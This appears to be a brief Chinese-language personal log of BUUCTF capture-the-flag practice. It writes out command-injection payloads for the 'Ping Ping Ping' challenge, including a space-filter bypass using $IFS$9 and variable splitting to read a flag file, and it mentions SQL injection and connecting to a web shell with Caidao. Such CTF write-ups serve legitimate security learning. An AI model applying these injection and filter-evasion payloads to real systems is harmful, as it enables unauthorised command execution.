buuctf刷题
[GXYCTF2019]Ping Ping Ping
这还是一道命令执行的题目
?ip=127.0.0.1;ls
?ip=127.0.0.1;cat flag
这里提示我们空格被过滤了
我们开始构建合适的payload
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
lovesql1
这是一道标准的sql注入题目group_concat是集合输出字段
极客大挑战 2019]Knife
连接caidao
得到flag
极客大挑战 2019]Http
“You cannot improve your past, but you can improve your future. Once time is wasted, life is wasted.”